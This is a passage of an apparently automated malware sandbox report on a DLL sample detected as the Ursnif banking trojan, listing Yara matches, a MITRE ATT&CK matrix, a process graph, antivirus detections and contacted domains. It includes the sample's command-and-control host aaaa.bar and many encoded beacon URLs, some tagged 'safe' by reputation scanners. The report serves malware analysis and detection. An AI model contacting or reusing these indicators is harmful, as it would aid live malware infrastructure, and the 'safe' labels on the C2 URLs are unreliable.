                      Source: Yara matchFile source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000009.00000003.668818796.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669066527.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.760454651.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.720146282.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.725551694.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669002058.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668792468.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696203622.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668767287.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696328482.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682552775.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729873849.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.751457455.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682707764.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682497297.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668983889.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682925882.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668839332.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.728388991.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682449280.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.729934950.0000000004EDC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669342603.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.726873336.0000000003A3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668597805.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696428988.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696293646.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.737533634.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668893514.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668698618.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.762064879.000000000532C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696353839.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696234648.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696265985.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.696490210.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.761914135.0000000005528000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682640820.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.682808858.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.683000420.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.668889642.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.731054718.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669161190.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739495874.00000000058CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668637384.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.669217152.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.739276832.0000000005AC8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.668670422.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.719599695.0000000003C38000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 2908, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4892, type: MEMORYSTR
                      Source: Yara matchFile source: 6.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.f30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.37194a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.10d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.509157681.0000000002A90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.796706497.0000000000F30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.563086752.00000000030D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.805512556.0000000010000000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.804704031.0000000003719000.00000004.00000040.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2DLL Side-Loading1DLL Side-Loading1Obfuscated Files or Information1Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsProcess Injection112Software Packing1Input Capture1File and Directory Discovery1Remote Desktop ProtocolCredential API Hooking3Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Logon Script (Windows)DLL Side-Loading1Security Account ManagerSystem Information Discovery3SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Rootkit4NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsSecurity Software Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion1Cached Domain CredentialsVirtualization/Sandbox Evasion1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRegsvr321Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 506330 Sample: gECym.bin Startdate: 20/10/2021 Architecture: WINDOWS Score: 100 26 dart.l.doubleclick.net 172.217.168.38, 443, 49824, 49825 GOOGLEUS United States 2->26 28 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49832, 49833 FASTLYUS United States 2->28 30 16 other IPs or domains 2->30 40 Multi AV Scanner detection for submitted file 2->40 42 Sigma detected: Powershell run code from registry 2->42 44 Yara detected  Ursnif 2->44 46 8 other signatures 2->46 8 loaddll32.exe 7 2->8         started        signatures3 process4 dnsIp5 34 aaaa.bar 31.220.111.98, 443, 49952, 49954 AS-HOSTINGERLT Lithuania 8->34 52 Writes or reads registry keys via WMI 8->52 54 Writes registry values via WMI 8->54 12 regsvr32.exe 8->12         started        16 cmd.exe 8->16         started        18 iexplore.exe 8->18         started        20 rundll32.exe 8->20         started        signatures6 process7 dnsIp8 36 aaaa.bar 12->36 56 System process connects to network (likely due to code injection or exploit) 12->56 58 Writes or reads registry keys via WMI 12->58 60 Writes registry values via WMI 12->60 22 rundll32.exe 16->22         started        38 192.168.2.1 unknown unknown 18->38 signatures9 process10 dnsIp11 32 aaaa.bar 22->32 48 System process connects to network (likely due to code injection or exploit) 22->48 50 Writes registry values via WMI 22->50 signatures12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      gECym.dll11%VirustotalBrowse
                      gECym.dll6%ReversingLabs

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.1.loaddll32.exe.10000000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      3.1.regsvr32.exe.10000000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.1.loaddll32.exe.10000000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      6.1.rundll32.exe.10000000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.loaddll32.exe.10d0000.1.unpack100%AviraHEUR/AGEN.1108168Download File
                      4.1.rundll32.exe.10000000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      0.2.loaddll32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://aaaa.bar/0%VirustotalBrowse
                      https://aaaa.bar/0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crw0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/yQNRXOou_2F/TKb_2FDPLUxEHX/34UsINmRGrF0U0brjExsG/R8lvAy6e3bs7Nh2H/QoLe_2Bwp2v2e8Z/IwuiqSnSaPWQnudhme/0fUiRiwnK/HC2m5rShJXeZnaMhBAa7/2sv1pUExc23tcG4uzbe/S9YqUCaVHHJSHD_2FHBasu/DOlWi2P1fW4xM/vPgP1tY3/PB1yvdHjP2kNFl0vG_2Fhxc/khv1QiPG/3tnR7uH.crw0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovu0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crw0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crw0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/MVdZIiu0NzX64W/jGgxHg6bC6YiiTOGCL_2B/K5_2B4OguOIrq_2F/deq5LFM1_2Fh_2B/A30hkj4LBKS8PnjdwI/9w5zD21KD/Gv4zCmpHpXW8kBPJ6yzJ/GKf4n1QcwBRAhkvF2a_/2BDpnBrAV7AZvGg_2FwtGG/RaDUbMye7jqhn/NmN4Vf9F/bD7myyGQXfiKlv1_2BoXKI7/VLTDzeWG/dZ.crw0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/H4GjPkmE7AedOn2/SaetnicpaebgBYZBph/BvmQBH2Ya/Oa7o5fA_2FxihzNsKVGG/_2BKOERN0ze3StZ8PJO/K9jrlAYK2cirYDQTLgJFGo/m_2BMIG_2Ff7J/M2tNW_2B/JwKxyFyNvYCJPpLYcu2z3fg/Co6_2F9DSd/aeV2iIileaWP_2B3q/B8Ii95Syxk_2/BFqOHwCSf6U/KnFKNxJjQfI9vK/6tnrhCZ8FpH5l_2FDWF/lT.crw0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png0%Avira URL Cloudsafe
                      https://ad-delivery.net/px.gif?ch=1&e=0.99731314610996270%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg0%Avira URL Cloudsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crw0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/WNAlg8cEc/UcfXfHTDCraOPvAxQ0u0/IBGE8nVsnVmaTWmqt_2/FgXrkKfYI9UDVTSC9YOK9U/edsq3qaEaK4UV/nX98HXXg/zJ1jx_2BUw5Fkli5F8AIb_2/FG3fGkSRfJ/J4BestfVNDAUFKDxV/xH_2BYMBJKGO/i9O5kI15Exg/Ujf1s7nWsRKDBP/pBWe2EoKcTyJW0r5TV22O/pk_2FzstpMvpdzlO/Mq8HfsXB/P.crw0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/gquCtxgLcwr_2F/e84ivzpkcm6RjGEX01HRQ/1JrxRgAMZnr84pf7/d6zLleHTDCpRxyP/mtUcNkhWJ9YEaOQAKu/ZbEc2Du6X/JsZUowsYOu98vblofvm0/EeOsadhZCmRp8ZCZ8KO/Ei99ya5BDB6uxeZYaXwGYu/W7LMC3IC7p7Aq/X8nzxfM9/9M7hUrRFHoU/Zf8MWsTW.crw0%Avira URL Cloudsafe
                      https://btloader.com/tag?o=6208086025961472&upapi=true0%URL Reputationsafe
                      https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF3y7v/VMJcRRP5R6TojvxFTX/kOSl73q2F/w8Q6acp8KbUFCwTOVCqa/KHPQFw1IxW8ntmCw6R5/_2FriFMvRAS7jKjzJNgjI_/2B3Jlm1ZTjVZL/7f9n_2Fm/j0A3VF_2BTXTJlyVXccf7gs/IMfn4fjHWd/I3IboiX_2F3/uQt3.crw0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/hqka30Wii/31Oq5rEnSRjUxODbgauN/3Qomlb_2B6I7h2xlFjq/YffmBTpCRrKlCahwBmdROz/L3L_2BpluTz9H/ch5yKjwO/n0FR27CV_2B_2FzpXk9iMJC/P_2Fk2e7Yv/b_2BW31QojrkMDFWC/tZHFJBu8lQql/OZI9lNxt6O0/sFuOUiC9FGcBD8/qZGUVX5D_2FYXiueA015K/GMEnEsw.crw0%Avira URL Cloudsafe
                      https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      contextual.media.net
                      		23.211.6.95
                      		truefalse
                        		high
                        dart.l.doubleclick.net
                        		172.217.168.38
                        		truefalse
                          		high
                          tls13.taboola.map.fastly.net
                          		151.101.1.44
                          		truefalse
                            		high
                            aaaa.bar
                            		31.220.111.98
                            		truefalse
                              		high
                              myip.opendns.com
                              		102.129.143.33
                              		truefalse
                                		high
                                hblg.media.net
                                		23.211.6.95
                                		truefalse
                                  		high
                                  lg3.media.net
                                  		23.211.6.95
                                  		truefalse
                                    		high
                                    resolver1.opendns.com
                                    		208.67.222.222
                                    		truefalse
                                      		high
                                      btloader.com
                                      		104.26.7.139
                                      		truefalse
                                        		high
                                        geolocation.onetrust.com
                                        		104.20.184.68
                                        		truefalse
                                          		high
                                          ad-delivery.net
                                          		104.26.3.70
                                          		truefalse
                                            		high
                                            www.msn.com
                                            		unknown
                                            		unknownfalse
                                              		high
                                              ad.doubleclick.net
                                              		unknown
                                              		unknownfalse
                                                		high
                                                srtb.msn.com
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  img.img-taboola.com
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    web.vortex.data.msn.com
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      222.222.67.208.in-addr.arpa
                                                      		unknown
                                                      		unknownfalse
                                                        		high
                                                        cvision.media.net
                                                        		unknown
                                                        		unknownfalse
                                                          		high

                                                          Contacted URLs

                                                          NameMaliciousAntivirus DetectionReputation
                                                          https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250false
                                                            		high
                                                            https://aaaa.bar/jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crwtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://aaaa.bar/jdraw/yQNRXOou_2F/TKb_2FDPLUxEHX/34UsINmRGrF0U0brjExsG/R8lvAy6e3bs7Nh2H/QoLe_2Bwp2v2e8Z/IwuiqSnSaPWQnudhme/0fUiRiwnK/HC2m5rShJXeZnaMhBAa7/2sv1pUExc23tcG4uzbe/S9YqUCaVHHJSHD_2FHBasu/DOlWi2P1fW4xM/vPgP1tY3/PB1yvdHjP2kNFl0vG_2Fhxc/khv1QiPG/3tnR7uH.crwtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crwtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpgfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.pngfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://aaaa.bar/jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crwtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://aaaa.bar/jdraw/MVdZIiu0NzX64W/jGgxHg6bC6YiiTOGCL_2B/K5_2B4OguOIrq_2F/deq5LFM1_2Fh_2B/A30hkj4LBKS8PnjdwI/9w5zD21KD/Gv4zCmpHpXW8kBPJ6yzJ/GKf4n1QcwBRAhkvF2a_/2BDpnBrAV7AZvGg_2FwtGG/RaDUbMye7jqhn/NmN4Vf9F/bD7myyGQXfiKlv1_2BoXKI7/VLTDzeWG/dZ.crwtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://aaaa.bar/jdraw/H4GjPkmE7AedOn2/SaetnicpaebgBYZBph/BvmQBH2Ya/Oa7o5fA_2FxihzNsKVGG/_2BKOERN0ze3StZ8PJO/K9jrlAYK2cirYDQTLgJFGo/m_2BMIG_2Ff7J/M2tNW_2B/JwKxyFyNvYCJPpLYcu2z3fg/Co6_2F9DSd/aeV2iIileaWP_2B3q/B8Ii95Syxk_2/BFqOHwCSf6U/KnFKNxJjQfI9vK/6tnrhCZ8FpH5l_2FDWF/lT.crwtrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationfalse
                                                              		high
                                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.pngfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ad-delivery.net/px.gif?ch=1&e=0.9973131461099627false
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpgfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
